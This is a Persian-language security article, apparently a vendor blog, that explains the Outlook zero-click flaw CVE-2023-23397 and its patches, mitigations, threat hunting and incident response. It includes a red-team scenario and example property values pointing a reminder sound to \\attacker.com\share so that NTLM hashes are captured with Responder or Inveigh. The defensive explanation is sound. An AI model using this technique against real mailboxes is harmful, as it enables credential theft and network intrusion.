یکی از خطرناکترین و پیچیدهترین آسیبپذیریهای Zero-Click در تاریخ Microsoft Outlook با شناسه CVE-2023-23397 می باشد. این نقص امنیتی به مهاجمان اجازه میدهد تنها با ارسال یک ایمیل تقویمی Calendar Invite بدون نیاز به تعامل کاربر، هش NTLM قربانی را استخراج کنند و از آن برای حملات Relay یا احراز هویت جعلی استفاده نمایند. این مقاله، یک تحلیل تخصصی، فنی و عملیاتی از ماهیت، نحوه بهرهبرداری، تأثیرات امنیتی و اقدامات دفاعی برای مقابله با این آسیبپذیری ارائه میدهد.
معرفی فنی آسیبپذیری CVE-2023-23397
آسیبپذیری CVE-2023-23397 یک آسیبپذیری از نوع Privilege Elevation و Authentication Relay است که در تمام نسخههای Outlook for Windows از جمله Outlook 2013 ،2016 ،2019 و Microsoft 365 وجود داشت. این نقص ناشی از نحوه پردازش ایمیلهای Calendar با Reminder است که شامل مسیر UNC به یک منبع SMB خارجی میباشد.
زمانی که Outlook این ایمیل را بدون تعامل کاربر پردازش میکند، بلافاصله یک اتصال SMB برقرار میکند و هش NTLM مربوط به کاربر را به آدرس SMB مشخص شده ارسال مینماید. این رفتار دقیقاً همان چیزی است که مهاجم برای حملات relay یا brute-force نیاز دارد.
شرایط بهرهبرداری یا Exploitation Conditions
برای بهرهبرداری موفق، مهاجم نیاز دارد:
- یک ایمیل Calendar حاوی یک Reminder با مسیر\attacker.com\share\ طراحی کند.
- ایمیل را به قربانی بفرستد که Outlook او در ویندوز اجرا میشود.
- بدون نیاز به باز کردن ایمیل،Outlook reminder را فعال میکند و اتصال SMB انجام میشود.
بیشتر بخوانید: بررسی ویژگی های Microsoft 365 برای کمک به سازمان ها
در نسخههای آسیبپذیر، این فرایند کاملاً Background است و هیچ Dialog یا هشدار امنیتی نمایش داده نمیشود. حتی در صورتی که ایمیل در Junk قرار گیرد،reminder میتواند اجرا شود.
مکانیزم فنی آسیبپذیری CVE-2023-23397: تحلیل ساختار ایمیل مخرب
ایمیل مخرب از نوع TNEF/MSG و حاوی پراپرتی خاصی به نامPidLidReminderFileParameter است. مقدار این پراپرتی به صورت زیر تنظیم میشود:
PidLidReminderFileParameter = “\\attacker-host\share”
هنگام پردازش reminder،Outlook تلاش میکند فایل صوتی یادآوری را از این مسیر بارگذاری کند. در نتیجه اتصال SMB به دامنه مهاجم برقرار میشود و NTLM Hash ارسال میگردد.
بردارهای حمله یا Attack Vectors
بردارهای عملی آسیبپذیری CVE-2023-23397 به شرح زیر است:
- Harvesting NTLM hashes: مهاجم میتواند هش NTLM را جمعآوری کرده و برای Brute-Force یا Cracking استفاده کند.
- :Pass-the-Hash attacks در محیطهای با احراز هویت NTLM، میتوان از این هش برای احراز هویت در سرویسهای دیگر استفاده کرد.
- NTLM relay: در صورتی که قربانی دسترسی به سرویسهایی مثل LDAP، SQL یا SMB داشته باشد، مهاجم میتواند احراز هویت را به آنها relay کند.
- :Internal lateral movement با استفاده از Relay، مهاجم میتواند در شبکه داخلی حرکت جانبی داشته باشد و Privilege Escalation انجام دهد.
برای مشاوره رایگان و یا پیاده سازی راهکارهای پشتیبان گیری و ذخیره سازی با کارشناسان شرکت APK تماس بگیرید. |
نمونه سناریوی حمله Red Team View در آسیبپذیری CVE-2023-23397
- مهاجم از دامنهای مثلAttacker.com استفاده میکند که دارای SMB listener است.
- یک ایمیل calendar حاوی reminder ساخته وPidLidReminderFileParameter را به \\attacker.com\share تنظیم میکند.
- ایمیل برای کاربر ارسال میشود.
- Outlook فوراً سعی میکند فایل صوتی یادآوری را از مسیر SMB بارگذاری کند.
- هش NTLM قربانی توسط ابزارهایی مثل Responder یا Inveigh ضبط میشود.
- مهاجم از Hash برایBrute-Force،Relay یا استفاده در حمله Pass-the-Hash بهره میبرد.
بیشتر بخوانید: راهنمای جامع برای پیشگیری و مقابله با حملات باجافزار Microsoft 365 – قسمت اول
راهکارهای دفاعی و اصلاحی
مایکروسافت یک بهروزرسانی امنیتی برای تمام نسخههای آسیبپذیر Outlook منتشر کرد. علاوه بر نصب Patch، اقدامات زیر برای کاهش ریسک توصیه میشوند:
بهروزرسانی نرمافزار Outlook
- Outlook 2013:Patch شماره KB5002254
- Outlook 2016: KB5002248
- Microsoft 365: از طریق Windows Update
غیر فعال کردن یادآوریهای صوتی از منابع خارجی در آسیبپذیری CVE-2023-23397
- از طریق Group Policy یا Registry میتوان بارگذاری فایلهای صوتی غیرمحلی را مسدود کرد.
حذف الویت PidLidReminderFileParameter در ایمیلهای ورودی
- با استفاده از ابزارهایی مانند Exchange Transport Rules یا Secure Email Gatewayها میتوان ایمیلهای حاوی این پراپرتی را بلاک یا پاکسازی کرد.
غیرفعال کردن NTLM در سراسر شبکه
- استفاده از Kerberos و محدود کردن Authentication به NTLM فقط در شرایط خاص
استفاده از امنیت پیشرفته ایمیل ATP / Defender for O365
- این راهکارها میتوانند Payloadهای مشکوک را قبل از تحویل تحلیل کنند.
ردیابی درخواستهای SMB غیرمنتظره به خارج از شبکه
- با استفاده ازSIEM ,Firewall و NDR میتوان رفتارهای مشکوک مثل اتصال به دامنه خارجی از طریق SMB را شناسایی کرد.
شناسایی فعالیت مخرب Threat Hunting / IOC
برای شناسایی حملات احتمالی از این آسیبپذیری، موارد زیر بررسی شود:
- لاگهای ترافیک SMB خروجی به آدرسهای غیرمعمول
- استفاده از ابزارهای ردیابی مانند Sysmon یا Ruleهایی برای اتصال SMB
- هشدار در صورت استفاده از PidLidReminderFileParameter در ایمیلهای داخلی
CVE-2023-23397 یک نمونه کلاسیک از حملات Zero-Click است که بدون هیچ تعاملی از سوی کاربر، میتواند باعث نشت اطلاعات حساس NTLM Hashes و در نهایت نفوذ به زیرساخت سازمان شود. اهمیت این آسیبپذیری در آن است که مهاجم میتواند تنها با ارسال یک ایمیل تقویمی، راه ورود به شبکه داخلی سازمان بیابد.
نصب سریع بهروزرسانی، اعمال تنظیمات محدودکننده، غیر فعالسازی NTLM و آموزش تیمهای امنیتی در شناسایی این بردار حمله، از جمله اقدامات کلیدی برای جلوگیری از سوءاستفادههای آتی هستند. سازمانهایی که از Outlook for Windows استفاده میکنند باید با فوریت این آسیبپذیری را بررسی و اصلاح کنند، زیرا همچنان در ابزارهای حمله APTها مشاهده میشود.
گامهای اجرایی برای تیمهای IT و امنیت اطلاعات
پس از شناسایی وجود این آسیبپذیری در زیرساخت، سازمانها باید طبق مراحل زیر اقدام کنند:
ارزیابی اولیه Initial Assessment
تعیین کاربران آسیبپذیر بر اساس نسخه Outlook و سیستمعامل
بررسی وضعیتPatchها از طریق WSUS،Intune یا SCCM
شناسایی سرورهایی که احتمالاً در معرض Relay قرار دارند SQ ,LDA ,SMB internal
مهار سریع Immediate Containment
ایجاد Rule موقت در فایروال یا Exchange Transport Rule برای بلاک کردن ایمیلهای حاوی PidLidReminderFileParameter
حذف ایمیلهای مخرب از Mailbox کاربران با استفاده از PowerShell یا ابزار Purge
مسدودسازی دامنههای SMB مشکوک در فایروال شبکه
پاکسازی و اصلاح Remediation
نصب آخرین بهروزرسانیهای Outlook
تنظیم Registry برای غیرفعالسازی بارگذاری فایل صوتی Reminder از مسیر UNC
فعالسازی logging پیشرفته در Outlook و سیستمعامل با کمک Sysmon
طراحی پاسخ به حادثه یا Incident Response بر اساس آسیبپذیری CVE-2023-23397
برای تیمهای SOC و IR، طراحی یک سناریوی پاسخ ساختیافته بر اساس مراحل زیر حیاتی است:
| مرحله | اقدام کلیدی |
| شناسایی | پایش لاگهای SIEM برای اتصالهای SMB به منابع خارجی |
| مهار | بلاک اتصال به \\*.com\* از سمت کلاینتهای داخلی |
| حذف تهدید | پاکسازی ایمیلهای تقویمی مشکوک از mailbox کاربران |
| بازبینی | ارزیابی سطوح دسترسی و Credentialهایی که احتمالاً فاش شدهاند |
| اطلاعرسانی | آگاهسازی کاربران و تیمهای داخلی نسبت به رفتار مشکوک Outlook |
| تقویت امنیت | تنظیم hardening برای NTLM، Outlook و Exchange Transport Rules |
پیامدهای استراتژیک سازمانی در برابر آسیبپذیری CVE-2023-23397
سازمانهایی که دچار بهرهبرداری از این آسیبپذیری میشوند، ممکن است با پیامدهای جدی مواجه گردند:
نشت غیرقابل برگشت اطلاعات احراز هویت NTLM Hashes که میتواند در Dark Web یا توسط گروههای APT بازیافت شود.
از دست رفتن کنترل دامنه Domain Compromise در صورت سوءاستفاده از NTLM relay برای ورود به سیستمهای مهم.
کاهش اعتماد کاربران و ذینفعان به زیرساخت امنیت سازمان
تحمل هزینههای بالا در پاسخ، بازیابی و پاکسازی
توصیههای نهایی و راهبردهای پیشگیرانه بلندمدت
برای کاهش احتمال حملات مشابه در آینده
مهاجرت به احراز هویت مبتنی بر Kerberos و حذف کامل NTLM در شبکه
استفاده از Conditional Access در Microsoft 365 برای کنترل دقیق رفتار Outlook
اعمال Data Loss Prevention و Content Filtering یا DLP برای ایمیلهای حاوی ساختارهای TNEF/MAPI مشکوک
تحلیل رفتار کاربر UEBA جهت شناسایی دسترسیهای غیرمنتظره
اجرای دورههای آموزشی آگاهیرسانی امنیتی برای کاربران نهایی و تیم Helpdesk
وضعیت فعلی CVE-2023-23397 در سال ۲۰۲۵
در فهرست “Known Exploited Vulnerabilities”سازمانهای ملی
سازمان امنیت سایبری آمریکا CISA این CVE را در Catalog of Known Exploited Vulnerabilities قرار داده است که نشان میدهد این آسیبپذیری همچنان تهدید واقعی و مورد استفاده مهاجمان است.
